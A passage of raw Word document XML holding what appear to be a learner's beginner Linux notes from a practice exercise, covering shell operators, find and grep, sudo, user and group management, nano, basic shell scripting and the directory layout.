    <w:p w14:paraId="58502E12" w14:textId="4B587556" w:rsidR="00BF3D9E" w:rsidRPr="0084205E" w:rsidRDefault="00BF3D9E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B9A3AF0" w14:textId="6AF9E1F0" w:rsidR="00BF3D9E" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows PuTTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DA781" w14:textId="1F9191C9" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Binary on windows or MacOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92868A" w14:textId="0E2A24C1" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&amp;&amp; = allows to execute a second command after the first one has executed successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D0A5E2" w14:textId="67F6F3BC" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&amp; = background command – command will execute in background, allowing user to execute commands while this one is running without having to wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F16A10" w14:textId="01CEDFAB" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$ - environment variable indicator – used to affect different processes and how they work. Editing these variables can change how certain processes work on computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A8723" w14:textId="67D28D86" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Touch $&lt;variable&gt; - change variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C2DAA" w14:textId="1B958BD6" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;&gt; - appends output to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322632A" w14:textId="13F80471" w:rsidR="007966F7" w:rsidRPr="0084205E" w:rsidRDefault="007966F7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">“|” = pipe = </w:t>
      </w:r>
      <w:r w:rsidR="0036242A" w:rsidRPr="0084205E">
        <w:t>allows to take the output of a command and use it as input for a second command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCF16FA" w14:textId="25D6BB6C" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. “cat &lt;file&gt; | grep &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0F2C1" w14:textId="2ACEA9FD" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Take file output and search for a specific string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C2A79" w14:textId="1F59A954" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">“;” – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &amp;&amp; but does not require first command to execute successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1B669" w14:textId="09878E9E" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“&gt;” – output redirection, redirect output of any command to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076F946" w14:textId="05A0C51C" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Echo hello &gt; file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B66E7C" w14:textId="005118B5" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If file already exists, will be completely replaced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D91F9" w14:textId="7FB8D00F" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“&gt;&gt;” – appends output of a command to a file, instead of erasing it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012CE3A" w14:textId="5A38F883" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Need to access shiba2 binary, which, when executed, will search for environment variable test1234 (which does not exist at this time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2B093" w14:textId="4CB442F5" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inputting the follow command creates test1234 environment variable and sets it equal to the preexisting $USER environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46273887" w14:textId="3A799662" w:rsidR="0036242A" w:rsidRPr="0084205E" w:rsidRDefault="0036242A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Export test1234=$USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658AFE39" w14:textId="09D47FC6" w:rsidR="00C211F2" w:rsidRPr="0084205E" w:rsidRDefault="00C211F2" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once shiba2 binary is run, it finds test1234 and unlocks, revealing shiba3 password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38367EF6" w14:textId="1DDF042C" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Binary – Shiba3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAFDA36" w14:textId="59EBDF95" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When looking for a specific file, in this case binary file shiba4, using “find /” was partially correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED3670" w14:textId="7976E6DB" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Needed to add “-name shiba4”, not simply “find / shiba4”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61834D1A" w14:textId="1B49552C" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Additionally, adding </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> grep shiba4 | grep shiba4” to find hidden files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67552D22" w14:textId="61FD2339" w:rsidR="00A8335A" w:rsidRPr="0084205E" w:rsidRDefault="00A8335A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Find / -name flag5* | grep </w:t>
      </w:r>
      <w:r w:rsidR="002D6690" w:rsidRPr="0084205E">
        <w:t>“flag5*”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FBE278" w14:textId="58DAA6DC" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574025D4" w14:textId="2A487357" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-u” specify user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D9876" w14:textId="5F0E1857" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Sudo -u &lt;user&gt; &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8B7CE" w14:textId="22E99394" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-l” – lists user sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF5846" w14:textId="20AAFAC9" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00495347" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – only doable by root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01738A44" w14:textId="55BB36BB" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5826186D" w14:textId="062BADBE" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Addgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00495347" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – only doable by root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562F2A7A" w14:textId="54B50D84" w:rsidR="008906D0" w:rsidRPr="0084205E" w:rsidRDefault="008906D0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Addgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>groupname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D46356" w14:textId="42D6C5ED" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Add user to a group using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4473EB0A" w14:textId="7B593637" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -a -G &lt;groups separated by commas&gt; &lt;user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881E567" w14:textId="793DC2D6" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“id” – allows you to view basic information about a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51687551" w14:textId="35E248B4" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AD827B" w14:textId="6AC2FC07" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Terminal based text editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B930D" w14:textId="30217D67" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nano &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4ABF7" w14:textId="5DFA9CC8" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl-x – exit and save options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D7F9E" w14:textId="2F8C1029" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Basic shell scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54B2CA" w14:textId="3343C4B0" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Storing list of commands in a file with a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD59B3" w14:textId="2D98BDC5" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Save and run bash s.sh – execute commands in order as list in said file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4EA95" w14:textId="3ABAACDC" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Directory structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26864200" w14:textId="7EA91B9B" w:rsidR="00495347" w:rsidRPr="0084205E" w:rsidRDefault="00495347" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“/” is the basis of everything (like C: in Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38950025" w14:textId="03A36394" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/passwd – stores user information</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – often used to see all the users on a system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2FCCC7" w14:textId="3031F0B0" w:rsidR="00A403FF" w:rsidRPr="0084205E" w:rsidRDefault="00A403FF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cat file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB5540" w14:textId="55BE8E0B" w:rsidR="00944F26" w:rsidRPr="0084205E" w:rsidRDefault="00944F26" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“groups” command shows which groups &lt;user&gt; is in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0168A257" w14:textId="31583797" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
